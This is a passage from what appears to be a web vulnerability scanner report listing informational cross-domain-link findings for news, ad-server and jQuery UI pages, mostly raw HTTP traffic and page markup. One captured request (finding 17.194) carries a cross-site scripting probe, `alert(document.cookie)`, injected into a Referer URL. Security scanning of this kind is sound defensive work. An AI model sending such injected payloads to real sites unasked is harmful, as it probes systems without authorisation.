http://www.bostonherald.com/mediacenter/electronic/
http://www.bostonherald.com/mediacenter/history/
http://www.bostonherald.com/mediacenter/tips/
http://www.bostonherald.com/mediakit/online/
http://www.bostonherald.com/mediakit/print/
http://www.bostonherald.com/news/
http://www.bostonherald.com/sports/
http://www.bostonherald.com/track/
http://www.bostonherald.com/wireless
http://www.carfind.com/
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.morningstar.com/
http://www.quantcast.com/p-352ZWwG8I7OVQ
https://im.morningstar.com/im/dot_clear.gif
https://im.morningstar.com/imCobrand/MorningstarLogo_102X28.gif

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html;charset=utf-8
Expires: Sat, 29 Jan 2011 04:49:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:22 GMT
Content-Length: 26005
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<div id="headerLogo">
<a href="http://www.bostonherald.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
    </div>
    <div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
<div id="home" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/sports/"><a href="/homepage.bg">
...[SNIP]...
<div id="news" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/news/">News & Opinion</a>
...[SNIP]...
<div id="sports" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/sports/">Sports</a>
...[SNIP]...
<div id="entertainment" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/entertainment/">Entertainment</a>
...[SNIP]...
<div id="business" class="tabSelected"><a href="http://www.bostonherald.com/business/">Business</a>
...[SNIP]...
<div id="inside" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/track/">Inside Track</a>
...[SNIP]...
<div id="blogs" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/blogs/">Blogs</a>
...[SNIP]...
<div id="media" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/mediacenter">Photos & Media</a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.carfind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind">Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.homefind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind">Homefind</a>
...[SNIP]...
div id="jobfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind">Jobfind</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsbsh9gu00000w80nzrti22h_8o9i/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.6.2"/></div>
...[SNIP]...

<link rel="stylesheet" type="text/css" href="http://v11.mivaInLine.us.miva.com/MIVALine/HighlightKeywords.css">

<SCRIPT LANGUAGE="JavaScript1.1">
...[SNIP]...

<script type="text/javascript" src="http://ibd.morningstar.com/quicktake/standard/client/shell/cobrand.js"></script>

<div id="MStarCommonPanel">

<link href="http://ibd.morningstar.com/quicktake/standard/client/shell/App_Themes/cobrand.css" type="text/css" rel="stylesheet" />
<link href="http://ibd.morningstar.com/quicktake/standard/client/shell/App_Themes/morningstaren.css" type="text/css" rel="stylesheet" />
<link href="http://ibd.morningstar.com/quicktake/standard/client/shell/App_Themes/quote.css" type="text/css" rel="stylesheet" />
<link href="http://ibd.morningstar.com/quicktake/standard/client/shell/App_Themes/tabnav.css" type="text/css" rel="stylesheet" />

<html>
...[SNIP]...
<td><img src="https://im.morningstar.com/im/dot_clear.gif" height="10" width="1"></td>
...[SNIP]...
<td class="msSmall"><a href="http://www.morningstar.com" target="_blank"><img src="https://im.morningstar.com/imCobrand/MorningstarLogo_102X28.gif" border="0" height="28" width="102"></a><br><a href="http://www.morningstar.com" target="_blank">.. Copyright 2011 Morningstar, Inc.</a>
...[SNIP]...
<td><img src="https://im.morningstar.com/im/dot_clear.gif" height="10" width="1"></td>
...[SNIP]...
</div>
<script type="text/javascript" src="http://ibd.morningstar.com/quicktake/standard/client/shell/GetSecList.axd?cn=AP707&ticker=&items=30&pages=10&pageno=0"></script>
...[SNIP]...
<div id="adMiddle" style="padding-top:15px">
<IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
</h3>

Daily Stock Quotes sent right to your phone.
<script type='text/javascript' src='http://www.4info.net/js/auto_jump.js'></script>
...[SNIP]...
</div>
   <a href="http://www.4info.net/logon.jsp" style="color:#000099">Modify or Cancel alerts</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="AdBottom">
        <IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_bottom ID=i_bottom FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
<div id="BottomNav">
        <a class="LinksRedNone" href="http://www.bostonherald.com/about/contact/">Contact us</a>  |  

        <a class="LinksRedNone" href="http://www.bostonherald.com/mediakit/print/">Print advertising</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediakit/online/">Online advertising</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/history/">Herald history</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/tips/">News tips</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/electronic/">Electronic edition</a>  |  

        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/browser/">Browser upgrade</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/about/home_delivery/">Home delivery</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/wireless">Herald wireless</a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.193. http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

Issue detail

The page was loaded from a URL containing a query string:

http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE

The response contains the following links to other domains:

http://ibd.morningstar.com/AP/graph.css
http://ibd.morningstar.com/AP/graph.js
http://im.morningstar.com/im/dot_clear.gif
http://im.morningstar.com/im/hp_go.jpg
https://im.morningstar.com/im/dot_clear.gif

Request

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/javascript
Vary: Accept-Encoding
Expires: Fri, 28 Jan 2011 21:57:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 21:57:28 GMT
Connection: close
Content-Length: 8304

document.write( '');
document.write( '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">');
...[SNIP]...
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1"/>');
document.write( ' <link rel="stylesheet" type="text/css" href="http://ibd.morningstar.com/AP/graph.css"/>');
document.write( ' <style type="text/css">
...[SNIP]...
</style>');
document.write( ' <script type="text/javascript" src="http://ibd.morningstar.com/AP/graph.js"></script>
...[SNIP]...
<td class="Rule" width="64"><img src="http://im.morningstar.com/im/dot_clear.gif" width="4" height="1"></td>
...[SNIP]...
<td class="Rule2" colspan="5"><img src="https://im.morningstar.com/im/dot_clear.gif" width="175" height="5"></td>
...[SNIP]...
<a href="javascript:apSubmitTickerLP(\'&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE=\')"><img border="0" src="http://im.morningstar.com/im/hp_go.jpg" align="middle" /></a>
...[SNIP]...
<td><img src="https://im.morningstar.com/im/dot_clear.gif" width="175" height="5"/></td>
...[SNIP]...

17.194. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/ab?enc=K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA.&tt_code=nydailynews.com&udj=uf%28%27a%27%2C+537%2C+1296224069%29%3Buf%28%27c%27%2C+5740%2C+1296224069%29%3Buf%28%27r%27%2C+157830%2C+1296224069%29%3Bppv%28783%2C+%273218538236873087490%27%2C+1296224069%2C+1297520069%2C+5740%2C+25733%29%3B&cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI.&referrer=http://www.nydailynews.com/blogs70f75

The response contains the following link to another domain:

http://aidps.redcated/AI/Api/v1/UserRest.svc/Provider/1AC1C520-232B-4E3D-B0CC-A52AC15EB7D4/User/4760492999213801733/gif?meta=appNexus

Request

GET /ab?enc=K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA.&tt_code=nydailynews.com&udj=uf%28%27a%27%2C+537%2C+1296224069%29%3Buf%28%27c%27%2C+5740%2C+1296224069%29%3Buf%28%27r%27%2C+157830%2C+1296224069%29%3Bppv%28783%2C+%273218538236873087490%27%2C+1296224069%2C+1297520069%2C+5740%2C+25733%29%3B&cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI.&referrer=http://www.nydailynews.com/blogs70f75 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; uuid2=4760492999213801733; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=FzXN9?TZi)>y1-^s2mzPD+@4+<i:[v#mk@cE3+b8?jraDJt@%+`'uLM/Dl+8<5/!Ww5LUeE=7?vbgm<6zEk@/WBJ[MOl!9-@aXV4)=rJOM@R5(?)a%ZJ2Wcbf*>2GHpO^8q6y4.W-*y?$3o38q>cC^S[A.LeTUm`>tMe:Vn15)3V9!][_fmn.CQInWmsln_lnhV2sS:M5*3DU7fN@fu#Pa!9L%Hn?en]; sess=1

Response

17.195. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-48597195_1296251864%2C11d765b6a10b1b3%2CMiscellaneous%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D199062%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.3579352851957083%3F

The response contains the following link to another domain:

http://r.openx.net/set?pid=408c9df8-85fe-6893-4938-ccbfd204601e&rtb=4760492999213801733

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-48597195_1296251864%2C11d765b6a10b1b3%2CMiscellaneous%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D199062%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.3579352851957083%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<fQCe7?0P(*AuB-u**g1:XIC(WUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy6A3fm`:Idk3X!(*W2F2Hk''SykpRE%:434AnQ9O>WxYDWB13NOp+/5AIyhgU6ROEcF@:XJvR6qJ:uuL`8Q2Vw2t![$ph'S1S['D+Ir$>37Xp$KdW'FoQ)MSzM(Q66u2x%X_(L:Sjx('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o>Pj9!*^

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 21:57:44 GMT
Content-Length: 664

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-48597195_1296251864,11d765b6a10b1b3,Miscellaneous,cm.cm_aa_gn1-cm.sportsreg-cm.spo
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://r.openx.net/set?pid=408c9df8-85fe-6893-4938-ccbfd204601e&rtb=4760492999213801733" width="1" height="1"/>');

17.196. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The page was loaded from a URL containing a query string:

http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/themes/base/jquery-ui.css
http://docs.jquery.com/Donate
http://jquery.com/
http://jquery.org/
http://plugins.jquery.com/
http://static.jquery.com/ui/css/base2.css
http://static.jquery.com/ui/themeroller/app_css/app_screen.css
http://static.jquery.com/ui/themeroller/scripts/app.js
http://www.filamentgroup.com/

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 04:51:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 119917

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="icon" href="/images/favicon.ico" type="image/x-icon" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/themeroller/app_css/app_screen.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/themes/base/jquery-ui.css" type="text/css" media="all" />
           <link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureH
...[SNIP]...
Shadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...
<li>
                   <a href="http://jquery.com">jQuery</a>
...[SNIP]...
<li style="padding-right: 12px;">
                   <a href="http://plugins.jquery.com/">Plugins</a>
...[SNIP]...
<li>
                   <a href="http://docs.jquery.com/Donate">Donate</a>
...[SNIP]...
</span>
               <a class="block filamentgroup" href="http://www.filamentgroup.com"><span>
...[SNIP]...
<span class="first" style="float: right; padding-right: 12px;">© 2010 The <a href="http://jquery.org/">jQuery Project</a>
...[SNIP]...

17.197. http://local.nissanusa.com/zip.aspx previous next

Summary
